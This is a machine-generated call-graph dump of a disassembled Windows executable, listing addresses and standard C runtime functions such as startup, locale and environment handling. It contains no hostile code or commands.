calls 18756->18757 18757->18755 18758->18755 18759 131c9ce __dosmaperr 20 API calls 18758->18759 18759->18756 18760 1314860 18761 131486a __wsopen_s 18760->18761 18762 1314883 GetLastError 18761->18762 18763 1314889 FormatMessageW 18761->18763 18762->18763 18764 13148d8 18763->18764 18765 13148ac 18763->18765 18767 1314c90 57 API calls 18764->18767 18766 1311860 57 API calls 18765->18766 18768 13148bb 18766->18768 18769 13148ec 18767->18769 18770 131786a _ValidateLocalCookies 5 API calls 18768->18770 18771 131786a _ValidateLocalCookies 5 API calls 18769->18771 18772 13148d1 18770->18772 18773 131490e 18771->18773 19153 131796b 19154 1317977 ___scrt_is_nonwritable_in_current_image 19153->19154 19178 1317e02 19154->19178 19156 131797e 19158 13179a7 19156->19158 19203 1318111 IsProcessorFeaturePresent 19156->19203 19166 13179e6 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 19158->19166 19189 131ffe7 19158->19189 19162 13179c6 ___scrt_is_nonwritable_in_current_image 19163 1317a46 19193 131822c 19163->19193 19165 1317a4c 19197 1311000 19165->19197 19166->19163 19211 132028a 19166->19211 19179 1317e0b 19178->19179 19231 131836b IsProcessorFeaturePresent 19179->19231 19183 1317e20 19183->19156 19184 1317e1c 19184->19183 19242 13208aa 19184->19242 19187 1317e37 19187->19156 19192 131fffe 19189->19192 19190 131786a _ValidateLocalCookies 5 API calls 19191 13179c0 19190->19191 19191->19162 19207 131ff8b 19191->19207 19192->19190 19364 1318520 19193->19364 19195 131823f GetStartupInfoW 19196 1318252 19195->19196 19196->19165 19198 1311006 19197->19198 19366 1314a10 19198->19366 19200 1311016 19374 1312450 19200->19374 19204 1318127 ___scrt_fastfail 19203->19204 19205 13181cf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19204->19205 19206 1318219 19205->19206 19206->19156 19208 131ffba 19207->19208 19209 131786a _ValidateLocalCookies 5 API calls 19208->19209 19210 131ffe3 19209->19210 19210->19166 19212 13202b2 pre_c_initialization _abort 19211->19212 19212->19163 19213 1324425 pre_c_initialization 38 API calls 19212->19213 19214 132093e 19213->19214 19215 1320acd _abort 38 API calls 19214->19215 19216 1320968 19215->19216 19232 1317e17 19231->19232 19233 13190d6 19232->19233 19234 13190db ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 19233->19234 19253 13192e8 19234->19253 19237 13190e9 19237->19184 19239 13190f1 19240 13190fc 19239->19240 19267 1319324 19239->19267 19240->19184 19308 13285a2 19242->19308 19245 13190ff 19246 1319108 19245->19246 19247 1319119 19245->19247 19248 13192cd ___vcrt_uninitialize_ptd 6 API calls 19246->19248 19247->19183 19249 131910d 19248->19249 19250 1319324 ___vcrt_uninitialize_locks DeleteCriticalSection 19249->19250 19251 1319112 19250->19251 19360 13195c2 19251->19360 19254 13192f1 19253->19254 19256 131931a 19254->19256 19257 13190e5 19254->19257 19271 1319542 19254->19271 19258 1319324 ___vcrt_uninitialize_locks DeleteCriticalSection 19256->19258 19257->19237 19259 131929a 19257->19259 19258->19257 19289 1319491 19259->19289 19261 13192a4 19266 13192af 19261->19266 19294 1319505 19261->19294 19263 13192bd 19264 13192ca 19263->19264 19299 13192cd 19263->19299 19264->19239 19266->19239 19268 131934e 19267->19268 19269 131932f 19267->19269 19268->19237 19270 1319339 DeleteCriticalSection 19269->19270 19270->19268 19270->19270 19276 1319370 19271->19276 19273 131955c 19274 1319579 InitializeCriticalSectionAndSpinCount 19273->19274 19275 1319565 19273->19275 19274->19275 19275->19254 19279 13193a0 19276->19279 19281 13193a4 __crt_fast_encode_pointer 19276->19281 19277 13193c4 19280 13193d0 GetProcAddress 19277->19280 19277->19281 19279->19277 19279->19281 19282 1319410 19279->19282 19280->19281 19281->19273 19283 1319438 LoadLibraryExW 19282->19283 19288 131942d 19282->19288 19284 1319454 GetLastError 19283->19284 19285 131946c 19283->19285 19284->19285 19286 131945f LoadLibraryExW 19284->19286 19287 1319483 FreeLibrary 19285->19287 19285->19288 19286->19285 19287->19288 19288->19279 19290 1319370 try_get_function 5 API calls 19289->19290 19291 13194ab 19290->19291 19292 13194c3 TlsAlloc 19291->19292 19293 13194b4 19291->19293 19293->19261 19295 1319370 try_get_function 5 API calls 19294->19295 19296 131951f 19295->19296 19297 1319539 TlsSetValue 19296->19297 19298 131952e 19296->19298 19297->19298 19298->19263 19300 13192dd 19299->19300 19301 13192d7 19299->19301 19300->19266 19303 13194cb 19301->19303 19304 1319370 try_get_function 5 API calls 19303->19304 19305 13194e5 19304->19305 19306 13194fc TlsFree 19305->19306 19307 13194f1 19305->19307 19306->19307 19307->19300 19311 13285bf 19308->19311 19312 13285bb 19308->19312 19309 131786a _ValidateLocalCookies 5 API calls 19310 1317e29 19309->19310 19310->19187 19310->19245 19311->19312 19314 132298e 19311->19314 19312->19309 19315 132299a ___scrt_is_nonwritable_in_current_image 19314->19315 19326 1325ffe EnterCriticalSection 19315->19326 19317 13229a1 19327 131e611 19317->19327 19319 13229b0 19320 13229bf 19319->19320 19340 1322822 GetStartupInfoW 19319->19340 19351 13229db 19320->19351 19323 13229d0 ___scrt_is_nonwritable_in_current_image 19323->19311 19326->19317 19328 131e61d ___scrt_is_nonwritable_in_current_image 19327->19328 19329 131e641 19328->19329 19330 131e62a 19328->19330 19354 1325ffe EnterCriticalSection 19329->19354 19332 131c9ce __dosmaperr 20 API calls 19330->19332 19333 131e62f 19332->19333 19334 1321788 __cftof 26 API calls 19333->19334 19336 131e639 ___scrt_is_nonwritable_in_current_image 19334->19336 19335 131e679 19355 131e6a0 19335->19355 19336->19319 19338 131e562 __wsopen_s 21 API calls 19339 131e64d 19338->19339 19339->19335 19339->19338 19341 13228d1 19340->19341 19342 132283f 19340->19342 19346 13228d8 19341->19346 19342->19341 19343 131e611 27 API calls 19342->19343 19344 1322868 19343->19344 19344->19341 19345 1322896 GetFileType 19344->19345 19345->19344 19347 13228df 19346->19347 19348 1322922 GetStdHandle 19347->19348 19349 132298a 19347->19349 19350 1322935 GetFileType 19347->19350 19348->19347 19349->19320 19350->19347 19359 1326046 LeaveCriticalSection 19351->19359 19353 13229e2 19353->19323 19354->19339 19358 1326046 LeaveCriticalSection 19355->19358 19357 131e6a7 19357->19336 19358->19357 19359->19353 19361 13195f1 19360->19361 19362 13195cb 19360->19362 19361->19247 19362->19361 19363 13195db FreeLibrary 19362->19363 19363->19362 19365 1318537 19364->19365 19365->19195 19365->19365 19367 1314a24 19366->19367 19368 1314a2d 19367->19368 19369 1314a50 WideCharToMultiByte 19367->19369 19370 1314ac0 19367->19370 19372 1314a8b WideCharToMultiByte 19367->19372 19368->19200 19369->19367 19369->19370 19371 1311860 59 API calls 19370->19371 19373 1314ae2 19371->19373 19372->19367 19372->19370 19373->19200 19375 131245a __wsopen_s 19374->19375 19432 131d2be 19375->19432 19433 131d2c9 19432->19433 19587 1325806 19433->19587 19436 1311770 19437 131177d 19436->19437 19588 1325818 19587->19588 19590 132582d 19587->19590 19589 131c9ce __dosmaperr 20 API calls 19588->19589 19591 132581d 19589->19591 19590->19588 19592 1325854 19590->19592 19593 1321788 __cftof 26 API calls 19591->19593 19596 1325711 19592->19596 19595 1312483 19593->19595 19595->19436 19599 13256c0 19596->19599 19600 13256cc ___scrt_is_nonwritable_in_current_image 19599->19600 19607 131a847 EnterCriticalSection 19600->19607 19602 13256da 19607->19602 21254 131fa5b 21255 131fa64 21254->21255 21260 131fa7d 21254->21260 21256 131fa6c 21255->21256 21261 131fab9 21255->21261 21258 131fa74 21258->21256 21274 131fd60 21258->21274 21262 131fac2 21261->21262 21263 131fac5 21261->21263 21262->21258 21284 1327978 21263->21284 21268 131fad7 21270 13209eb _free 20 API calls 21268->21270 21271 131fb0c 21270->21271 21271->21258 21272 131fae2 21273 13209eb _free 20 API calls 21272->21273 21273->21268 21275 131fd6d 21274->21275 21281 131fd72 21274->21281 21275->21260 21276 131fd78 WideCharToMultiByte 21276->21281 21282 131fdcd 21276->21282 21277 1320b10 _abort 20 API calls 21277->21281 21278 131fdd3 21280 13209eb _free 20 API calls 21278->21280 21279 131fd9e WideCharToMultiByte 21279->21278 21279->21281 21280->21282 21281->21276 21281->21277 21281->21278 21281->21279 21281->21282 21283 13209eb _free 20 API calls 21281->21283 21282->21260 21283->21281 21285 1327981 21284->21285 21287 131facc 21284->21287 21317 1327877 21285->21317 21288 1327c60 GetEnvironmentStringsW 21287->21288 21289 1327c77 21288->21289 21299 1327cca 21288->21299 21292 1327c7d WideCharToMultiByte 21289->21292 21290 1327cd3 FreeEnvironmentStringsW 21291 131fad1 21290->21291 21291->21268 21300 131fb66 21291->21300 21293 1327c99 21292->21293 21292->21299 21294 1320a25 __fread_nolock 21 API calls 21293->21294 21295 1327c9f 21294->21295 21296 1327cbc 21295->21296 21297 1327ca6 WideCharToMultiByte 21295->21297 21298 13209eb _free 20 API calls 21296->21298 21297->21296 21298->21299 21299->21290 21299->21291 21301 131fb7b 21300->21301 21302 1320b10 _abort 20 API calls 21301->21302 21312 131fba2 21302->21312 21303 131fc06 21304 13209eb _free 20 API calls 21303->21304 21305 131fc20 21304->21305 21305->21272 21306 1320b10 _abort 20 API calls 21306->21312 21307 131fc08 21443 131fd31 21307->21443 21309 1320a73 26 API calls 21309->21312 21311 13209eb _free 20 API calls 21311->21303 21312->21303 21312->21306 21312->21307 21312->21309 21313 131fc2a 21312->21313 21315 13209eb _free 20 API calls 21312->21315 21314 1321798 __cftof 11 API calls 21313->21314 21316 131fc36 21314->21316 21315->21312 21318 1324425 pre_c_initialization 38 API calls 21317->21318 21319 1327884 21318->21319 21320 1327996 __fassign 38 API calls 21319->21320 21321 132788c 21320->21321 21337 132760b 21321->21337 21324 13278a3 21324->21287 21325 1320a25 __fread_nolock 21 API calls 21326 13278b4 21325->21326 21327 13278e6 21326->21327 21344 1327a38 21326->21344 21330 13209eb _free 20 API calls 21327->21330 21330->21324 21331 13278e1 21332 131c9ce __dosmaperr 20 API calls 21331->21332 21332->21327 21333 132792a 21333->21327 21354 13274e1 21333->21354 21334 13278fe 21334->21333 21335 13209eb _free 20 API calls 21334->21335 21335->21333 21338 131afae __fassign 38 API calls 21337->21338 21339 132761d 21338->21339 21340 132763e 21339->21340 21341 132762c GetOEMCP 21339->21341 21342 1327643 GetACP 21340->21342 21343 1327655 21340->21343 21341->21343 21342->21343 21343->21324 21343->21325 21345 132760b 40 API calls 21344->21345 21346 1327a57 21345->21346 21349 1327aa8 IsValidCodePage 21346->21349 21351 1327a5e 21346->21351 21353 1327acd ___scrt_fastfail 21346->21353 21347 131786a _ValidateLocalCookies 5 API calls 21348 13278d9 21347->21348 21348->21331 21348->21334 21350 1327aba GetCPInfo 21349->21350 21349->21351 21350->21351 21350->21353 21351->21347 21357 13276e3 GetCPInfo 21353->21357 21421 132749e 21354->21421 21363 132771d 21357->21363 21366 13277c7 21357->21366 21360 131786a _ValidateLocalCookies 5 API calls 21362 1327873 21360->21362 21362->21351 21367 1328041 21363->21367 21365 132916e 43 API calls 21365->21366 21366->21360 21368 131afae __fassign 38 API calls 21367->21368 21369 1328061 MultiByteToWideChar 21368->21369 21371 132809f 21369->21371 21372 1328137 21369->21372 21374 1320a25 __fread_nolock 21 API calls 21371->21374 21377 13280c0 ___scrt_fastfail 21371->21377 21373 131786a _ValidateLocalCookies 5 API calls 21372->21373 21375 132777e 21373->21375 21374->21377 21381 132916e 21375->21381 21376 1328131 21378 132815e __freea 20 API calls 21376->21378 21377->21376 21379 1328105 MultiByteToWideChar 21377->21379 21378->21372 21379->21376 21380 1328121 GetStringTypeW 21379->21380 21380->21376 21382 131afae __fassign 38 API calls 21381->21382 21383 1329181 21382->21383 21386 1328f51 21383->21386 21387 1328f6c 21386->21387 21388 1328f92 MultiByteToWideChar 21387->21388 21389 1329146 21388->21389 21390 1328fbc 21388->21390 21391 131786a _ValidateLocalCookies 5 API calls 21389->21391 21393 1320a25 __fread_nolock 21 API calls 21390->21393 21396 1328fdd 21390->21396 21392 132779f 21391->21392 21392->21365 21393->21396 21394 1329026 MultiByteToWideChar 21395 1329092 21394->21395 21397 132903f 21394->21397 21399 132815e __freea 20 API calls 21395->21399 21396->21394 21396->21395 21413 1323980 21397->21413 21399->21389 21414 1323587 _abort 5 API calls 21413->21414 21422 13274aa ___scrt_is_nonwritable_in_current_image 21421->21422 21429 1325ffe EnterCriticalSection 21422->21429 21424 13274b4 21430 1327509 21424->21430 21429->21424 21431 1319bdb __fread_nolock 26 API calls 21430->21431 21432 1327557 21431->21432 21433 1319bdb __fread_nolock 26 API calls 21432->21433 21434 1327573 21433->21434 21435 1319bdb __fread_nolock 26 API calls 21434->21435 21436 1327591 21435->21436 21437 13274c1 21436->21437 21438 13209eb _free 20 API calls 21436->21438 21439 13274d5 21437->21439 21438->21437 21442 1326046 LeaveCriticalSection 21439->21442 21441 13274df 21442->21441 21444 131fd3e 21443->21444 21448 131fc0e 21443->21448 21445 131fd55 21444->21445 21446 13209eb _free 20 API calls 21444->21446 21447 13209eb _free 20 API calls 21445->21447 21446->21444 21447->21448 21448->21311 19026 1326ba5 19027 1326bb1 ___scrt_is_nonwritable_in_current_image 19026->19027 19034 1325ffe EnterCriticalSection 19027->19034 19029 1326bbc 19035 1326bfa 19029->19035 19033 1326be6 ___scrt_is_nonwritable_in_current_image 19034->19029 19036 1326c09 19035->19036 19037 1326c1c 19035->19037 19038 131c9ce __dosmaperr 20 API calls 19036->19038 19039 1326c2e 19037->19039 19040 1326c6f 19037->19040 19041 1326c0e 19038->19041 19056 1326aab 19039->19056 19042 131c9ce __dosmaperr 20 API calls 19040->19042 19043 1321788 __cftof 26 API calls 19041->19043 19044 1326c74 19042->19044 19047 1326bd2 19043->19047 19046 1321788 __cftof 26 API calls 19044->19046 19046->19047 19053 1326bf1 19047->19053 19051 1321798 __cftof 11 API calls 19052 1326ca1 19051->19052 19152 1326046 LeaveCriticalSection 19053->19152 19055 1326bf8 19055->19033 19058 1326ab8 19056->19058 19057 1326b0c 19057->19047 19060 1320a73 19057->19060 19058->19057 19069 132c265 19058->19069 19061 1320a80 19060->19061 19064 1320a8e 19060->19064 19061->19064 19067 1320aa5 19061->19067 19062 131c9ce __dosmaperr 20 API calls 19063 1320a96 19062->19063 19065 1321788 __cftof 26 API calls 19063->19065 19064->19062 19066 1320aa0 19065->19066 19066->19047 19066->19051 19067->19066 19068 131c9ce __dosmaperr 20 API calls 19067->19068 19068->19063 19070 132c273 19069->19070 19073 132c28e 19070->19073 19074 131afae __fassign 38 API calls 19073->19074 19075 132c2a4 19074->19075 19076 132c2c0 19075->19076 19077 132c2d7 19075->19077 19079 132c289 19075->19079 19078 131c9ce __dosmaperr 20 API calls 19076->19078 19081 132c2f2 19077->19081 19082 132c2e0 19077->19082 19080 132c2c5 19078->19080 19079->19058 19085 1321788 __cftof 26 API calls 19080->19085 19083 132c312 19081->19083 19084 132c2ff 19081->19084 19086 131c9ce __dosmaperr 20 API calls 19082->19086 19104 132d2f2 19083->19104 19093 132b68e 19084->19093 19085->19079 19089 132c2e5 19086->19089 19091 1321788 __cftof 26 API calls 19089->19091 19091->19079 19092 131c9ce __dosmaperr 20 API calls 19092->19079 19094 132b6a0 19093->19094 19095 132b6d8 ___ascii_strnicmp 19093->19095 19096 131afae __fassign 38 API calls 19094->19096 19095->19079 19097 132b6ae 19096->19097 19098 132b6c8 19097->19098 19103 132b6da 19097->19103 19099 131c9ce __dosmaperr 20 API calls 19098->19099 19100 132b6cd 19099->19100 19101 1321788 __cftof 26 API calls 19100->19101 19101->19095 19102 1323dbf 46 API calls 19102->19103 19103->19095 19103->19102 19105 131afae __fassign 38 API calls 19104->19105 19106 132d305 19105->19106 19109 132d04a 19106->19109 19111 132d07e 19109->19111 19110 131786a _ValidateLocalCookies 5 API calls 19112 132c328 19110->19112 19113 132d16c MultiByteToWideChar 19111->19113 19115 132d0f1 GetCPInfo 19111->19115 19124 132d0a5 19111->19124 19112->19079 19112->19092 19114 132d18a 19113->19114 19113->19124 19116 1320a25 __fread_nolock 21 API calls 19114->19116 19122 132d1ab 19114->19122 19119 132d100 19115->19119 19115->19124 19116->19122 19117 132d2cf 19121 132815e __freea 20 API calls 19117->19121 19118 132d1fe MultiByteToWideChar 19118->19117 19120 132d21a MultiByteToWideChar 19118->19120 19119->19113 19119->19124 19120->19117 19123 132d234 19120->19123 19121->19124 19122->19117 19122->19118 19125 1320a25 __fread_nolock 21 API calls 19123->19125 19128 132d255 19123->19128 19124->19110 19125->19128 19126 132d292 MultiByteToWideChar 19127 132d2c2 19126->19127 19129 132d2a9 19126->19129 19140 132815e 19127->19140 19128->19126 19128->19127 19132 13236ec 19129->19132 19144 132356d 19132->19144 19135 1323708 19138 131786a _ValidateLocalCookies 5 API calls 19135->19138 19139 132375a 19138->19139 19139->19127 19141 132816a 19140->19141 19143 132817b 19140->19143 19142 13209eb _free 20 API calls 19141->19142 19141->19143 19142->19143 19143->19117 19145 1323587 _abort 5 API calls 19144->19145 19146 1323583 19145->19146 19146->19135 19147 1323a08 19146->19147 19148 1323587 _abort 5 API calls 19147->19148 19149 1323a2f 19148->19149 19150 131786a _ValidateLocalCookies 5 API calls 19149->19150 19151 1323748 CompareStringW 19150->19151 19151->19135 19152->19055 22980 13178ad 22981 13178b5 pre_c_initialization 22980->22981 22998 131d815 22981->22998 22983 13178c0 pre_c_initialization 23005 1317e3b 22983->23005 22985 1317949 22986 1318111 ___scrt_fastfail 4 API calls 22985->22986 22988 1317950 ___scrt_initialize_default_local_stdio_options 22986->22988 22987 13178d5 __RTC_Initialize 22987->22985 23010 1317fdc 22987->23010 22990 13178ee pre_c_initialization 22990->22985 22991 13178ff 22990->22991 23013 13180a9 InitializeSListHead 22991->23013 22993 1317904 pre_c_initialization 23014 13180b5 22993->23014 22995 1317927 pre_c_initialization 23020 1320335 22995->23020 22997 1317932 pre_c_initialization 22999 131d824 22998->22999 23000 131d847 22998->23000 22999->23000 23001 131c9ce __dosmaperr 20 API calls 22999->23001 23000->22983 23002 131d837 23001->23002 23003 1321788 __cftof 26 API calls 23002->23003 23004 131d842 23003->23004 23004->22983 23006 1317e49 23005->23006 23007 1317e4e ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 23005->23007 23006->23007 23008 1318111 ___scrt_fastfail 4 API calls 23006->23008 23007->22987 23009 1317ed1 23008->23009 23027 1317fa1 23010->23027 23013->22993 23065 13208ce 23014->23065 23016 13180c6 23017 13180cd 23016->23017 23018 1318111 ___scrt_fastfail 4 API calls 23016->23018 23017->22995 23019 13180d5 23018->23019 23021 1324425 pre_c_initialization 38 API calls 23020->23021 23022 1320340 23021->23022 23023 131c9ce __dosmaperr 20 API calls 23022->23023 23026 1320378 23022->23026 23024 132036d 23023->23024 23025 1321788 __cftof 26 API calls 23024->23025 23025->23026 23026->22997 23028 1317fc5 23027->23028 23029 1317fbe 23027->23029 23036 1320795 23028->23036 23033 1320725 23029->23033 23032 1317fc3 23032->22990 23034 1320795 __onexit 29 API calls 23033->23034 23035 1320737 23034->23035 23035->23032 23039 132049c 23036->23039 23042 13203d2 23039->23042 23041 13204c0 23041->23032 23043 13203de ___scrt_is_nonwritable_in_current_image 23042->23043 23050 1325ffe EnterCriticalSection 23043->23050 23045 13203ec 23051 13205e4 23045->23051 23047 13203f9 23061 1320417 23047->23061 23049 132040a ___scrt_is_nonwritable_in_current_image 23049->23041 23050->23045 23052 1320602 23051->23052 23053 13205fa pre_c_initialization __crt_fast_encode_pointer 23051->23053 23052->23053 23054 132065b 23052->23054 23056 132850f __onexit 29 API calls 23052->23056 23053->23047 23054->23053 23055 132850f __onexit 29 API calls 23054->23055 23058 1320671 23055->23058 23057 1320651 23056->23057 23059 13209eb _free 20 API calls 23057->23059 23060 13209eb _free 20 API calls 23058->23060 23059->23054 23060->23053 23064 1326046 LeaveCriticalSection 23061->23064 23063 1320421 23063->23049 23064->23063 23066 13208ec pre_c_initialization 23065->23066 23070 132090c pre_c_initialization 23065->23070 23067 131c9ce __dosmaperr 20 API calls 23066->23067 23068 1320902 23067->23068 23069 1321788 __cftof 26 API calls 23068->23069 23069->23070 23070->23016 22295 1328599 22298 13285bf 22295->22298 22299 13285bb 22295->22299 22296 131786a _ValidateLocalCookies 5 API calls 22297 1328621 22296->22297 22298->22299 22300 132298e 31 API calls 22298->22300 22299->22296 22300->22298 21449 132548c 21450 1325642 21449->21450 21452 13254b6 21449->21452 21451 131c9ce __dosmaperr 20 API calls 21450->21451 21468 132562d 21451->21468 21452->21450 21455 1325513 21452->21455 21453 131786a _ValidateLocalCookies 5 API calls 21454 132565f 21453->21454 21470 132b3ce 21455->21470 21457 1325533 21478 132ac02 21457->21478 21459 1325547 21460 1325663 21459->21460 21485 132ac2e 21459->21485 21461 1321798 __cftof 11 API calls 21460->21461 21463 132566d 21461->21463 21464 1325559 21464->21460 21492 132ac5a 21464->21492 21466 132556b 21466->21460 21467 1325574 21466->21467 21467->21468 21499 132b41f 21467->21499 21468->21453 21471 132b3da ___scrt_is_nonwritable_in_current_image 21470->21471 21472 132b410 ___scrt_is_nonwritable_in_current_image 21471->21472 21507 1325ffe EnterCriticalSection 21471->21507 21472->21457 21474 132b3ea 21475 132b3fd 21474->21475 21508 132b2ee 21474->21508 21526 132b416 21475->21526 21479 132ac23 21478->21479 21480 132ac0e 21478->21480 21479->21459 21481 131c9ce __dosmaperr 20 API calls 21480->21481 21482 132ac13 21481->21482 21483 1321788 __cftof 26 API calls 21482->21483 21484 132ac1e 21483->21484 21484->21459 21486 132ac3a 21485->21486 21487 132ac4f 21485->21487 21488 131c9ce __dosmaperr 20 API calls 21486->21488 21487->21464 21489 132ac3f 21488->21489 21490 1321788 __cftof 26 API calls 21489->21490 21491 132ac4a 21490->21491 21491->21464 21493 132ac66 21492->21493 21494 132ac7b 21492->21494 21495 131c9ce __dosmaperr 20 API calls 21493->21495 21494->21466 21496 132ac6b 21495->21496 21497 1321788 __cftof 26 API calls 21496->21497 21498 132ac76 21497->21498 21498->21466 21500 132b42b ___scrt_is_nonwritable_in_current_image 21499->21500 21636 1325ffe EnterCriticalSection 21500->21636 21502 132b436 21637 132ac86 21502->21637 21506 132b455 ___scrt_is_nonwritable_in_current_image 21506->21468 21507->21474 21510 132b33a 21508->21510 21509 132b341 21511 132b3b1 21509->21511 21513 132b3a8 21509->21513 21510->21509 21512 1320a25 __fread_nolock 21 API calls 21510->21512 21590 132b193 21511->21590 21520 132b359 21512->21520 21529 132afbe 21513->21529 21516 132b3ae 21518 13209eb _free 20 API calls 21516->21518 21517 132b360 21519 13209eb _free 20 API calls 21517->21519 21521 132b3bc 21518->21521 21519->21509 21520->21517 21522 132b386 21520->21522 21523 131786a _ValidateLocalCookies 5 API calls 21521->21523 21524 13209eb _free 20 API calls 21522->21524 21525 132b3ca 21523->21525 21524->21509 21525->21475 21635 1326046 LeaveCriticalSection 21526->21635 21528 132b41d 21528->21472 21530 132afcd 21529->21530 21531 132ac5a 26 API calls 21530->21531 21532 132afe3 21531->21532 21533 132ac02 26 API calls 21532->21533 21587 132b15d 21532->21587 21535 132aff5 21533->21535 21534 1321798 __cftof 11 API calls 21536 132b192 21534->21536 21537 13209eb _free 20 API calls 21535->21537 21541 132b166 21535->21541 21535->21587 21539 132ac5a 26 API calls 21536->21539 21538 132b045 21537->21538 21543 1320a25 __fread_nolock 21 API calls 21538->21543 21540 132b1b8 21539->21540 21542 132b2e3 21540->21542 21545 132ac02 26 API calls 21540->21545 21541->21516 21544 1321798 __cftof 11 API calls 21542->21544 21547 132b05d 21543->21547 21550 132b2ed 21544->21550 21546 132b1ca 21545->21546 21546->21542 21549 132ac2e 26 API calls 21546->21549 21548 13209eb _free 20 API calls 21547->21548 21555 132b069 21548->21555 21551 132b1dc 21549->21551 21552 132b341 21550->21552 21559 1320a25 __fread_nolock 21 API calls 21550->21559 21551->21542 21553 132b1e5 21551->21553 21556 132b3b1 21552->21556 21560 132b3a8 21552->21560 21554 13209eb _free 20 API calls 21553->21554 21557 132b1f0 GetTimeZoneInformation 21554->21557 21555->21541 21558 1320a73 26 API calls 21555->21558 21561 132b193 45 API calls 21556->21561 21563 132b20c 21557->21563 21573 132b2ad 21557->21573 21565 132b093 21558->21565 21567 132b359 21559->21567 21562 132afbe 45 API calls 21560->21562 21564 132b3ae 21561->21564 21562->21564 21630 1327d59 21563->21630 21568 13209eb _free 20 API calls 21564->21568 21569 13250a9 26 API calls 21565->21569 21565->21587 21566 132b360 21570 13209eb _free 20 API calls 21566->21570 21567->21566 21572 132b386 21567->21572 21571 132b3bc 21568->21571 21579 132b0ac 21569->21579 21570->21552 21574 131786a _ValidateLocalCookies 5 API calls 21571->21574 21576 13209eb _free 20 API calls 21572->21576 21573->21516 21577 132b3ca 21574->21577 21576->21552 21577->21516 21579->21587 21626 1321594 21579->21626 21580 132b27f WideCharToMultiByte 21580->21573 21584 132b120 21584->21541 21586 13250a9 26 API calls 21584->21586 21585 1321594 42 API calls 21588 132b0fb 21585->21588 21586->21587 21587->21534 21587->21541 21588->21584 21589 1321594 42 API calls 21588->21589 21589->21584 21591 132b1a2 21590->21591 21592 132ac5a 26 API calls 21591->21592 21593 132b1b8 21592->21593 21594 132b2e3 21593->21594 21596 132ac02 26 API calls 21593->21596 21595 1321798 __cftof 11 API calls 21594->21595 21602 132b2ed 21595->21602 21597 132b1ca 21596->21597 21597->21594 21598 132ac2e 26 API calls 21597->21598 21599 132b1dc 21598->21599 21599->21594 21600 132b1e5 21599->21600 21601 13209eb _free 20 API calls 21600->21601 21604 132b1f0 GetTimeZoneInformation 21601->21604 21605 1320a25 __fread_nolock 21 API calls 21602->21605 21616 132b341 21602->21616 21603 132b3b1 21607 132b193 45 API calls 21603->21607 21614 132b20c 21604->21614 21623 132b2ad 21604->21623 21613 132b359 21605->21613 21606 132b3a8 21608 132afbe 45 API calls 21606->21608 21609 132b3ae 21607->21609 21608->21609 21611 13209eb _free 20 API calls 21609->21611 21610 132b360 21612 13209eb _free 20 API calls 21610->21612 21615 132b3bc 21611->21615 21612->21616 21613->21610 21617 132b386 21613->21617 21619 1327d59 38 API calls 21614->21619 21618 131786a _ValidateLocalCookies 5 API calls 21615->21618 21616->21603 21616->21606 21620 13209eb _free 20 API calls 21617->21620 21621 132b3ca 21618->21621 21622 132b261 WideCharToMultiByte 21619->21622 21620->21616 21621->21516 21624 132b27f WideCharToMultiByte 21622->21624 21623->21516 21624->21623 21627 13215ad 21626->21627 21628 1320bbb 42 API calls 21627->21628 21629 13215b7 21628->21629 21629->21584 21629->21585 21631 1324425 pre_c_initialization 38 API calls 21630->21631 21632 1327d64 21631->21632 21633 1324574 __fassign 38 API calls 21632->21633 21634 1327d74 WideCharToMultiByte 21633->21634 21634->21580 21635->21528 21636->21502 21638 132ac02 26 API calls 21637->21638 21639 132ac9b 21638->21639 21640 132ae62 21639->21640 21641 132aca4 21639->21641 21642 1321798 __cftof 11 API calls 21640->21642 21644 132ada4 21641->21644 21645 132acd8 21641->21645 21651 132ad9f 21641->21651 21643 132ae6c 21642->21643 21646 132ae6d 26 API calls 21644->21646 21656 132ae6d 21645->21656 21648 132add9 21646->21648 21649 132ae6d 26 API calls 21648->21649 21649->21651 21653 132b460 21651->21653 21652 132ae6d 26 API calls 21652->21651 21663 1326046 LeaveCriticalSection 21653->21663 21655 132b467 21655->21506 21657 132ae83 21656->21657 21658 132ac2e 26 API calls 21657->21658 21660 132ad38 21657->21660 21659 132af64 21658->21659 21659->21660 21661 1321798 __cftof 11 API calls 21659->21661 21660->21652 21662 132afbc 21661->21662 21663->21655 22564 131a7fb 22574 131dade 22564->22574 22568 131a808 22569 1321aed 20 API calls 22568->22569 22570 131a817 DeleteCriticalSection 22569->22570 22570->22568 22571 131a832 22570->22571 22572 13209eb _free 20 API calls 22571->22572 22573 131a83d 22572->22573 22575 131dae7 66 API calls 22574->22575 22576 131a803 22575->22576 22577 1323b47 22576->22577 22578 1323b53 ___scrt_is_nonwritable_in_current_image 22577->22578 22587 1325ffe EnterCriticalSection 22578->22587 22580 1323bc9 22588 1323bde 22580->22588 22581 1323b5e 22581->22580 22584 1323b9d DeleteCriticalSection 22581->22584 22585 1319889 67 API calls 22581->22585 22583 1323bd5 ___scrt_is_nonwritable_in_current_image 22583->22568 22586 13209eb _free 20 API calls 22584->22586 22585->22581 22586->22581 22587->22581 22591 1326046 LeaveCriticalSection 22588->22591 22590 1323be5 22590->22583 22591->22590 23235 13202e3 23236 13202ef ___scrt_is_nonwritable_in_current_image 23235->23236 23237 1320326 ___scrt_is_nonwritable_in_current_image 23236->23237 23243 1325ffe EnterCriticalSection 23236->23243 23239 1320303 23244 13284bf 23239->23244 23243->23239 23245 1320313 23244->23245 23246 13284cd __fassign 23244->23246 23248 132032c 23245->23248 23246->23245 23251 13281fb 23246->23251 23365 1326046 LeaveCriticalSection 23248->23365 23250 1320333 23250->23237 23252 1328211 23251->23252 23254 132827b 23251->23254 23252->23254 23256 1328244 23252->23256 23261 13209eb _free 20 API calls 23252->23261 23255 13209eb _free 20 API calls 23254->23255 23278 13282c9 23254->23278 23257 132829d 23255->23257 23258 1328266 23256->23258 23266 13209eb _free 20 API calls 23256->23266 23259 13209eb _free 20 API calls 23257->23259 23260 13209eb _free 20 API calls 23258->23260 23262 13282b0 23259->23262 23263 1328270 23260->23263 23265 1328239 23261->23265 23267 13209eb _free 20 API calls 23262->23267 23268 13209eb _free 20 API calls 23263->23268 23264 1328337 23269 13209eb _free 20 API calls 23264->23269 23279 1327d80 23265->23279 23272 132825b 23266->23272 23273 13282be 23267->23273 23268->23254 23274 132833d 23269->23274 23271 13209eb 20 API calls _free 23275 13282d7 23271->23275 23307 1327e7e 23272->23307 23277 13209eb _free 20 API 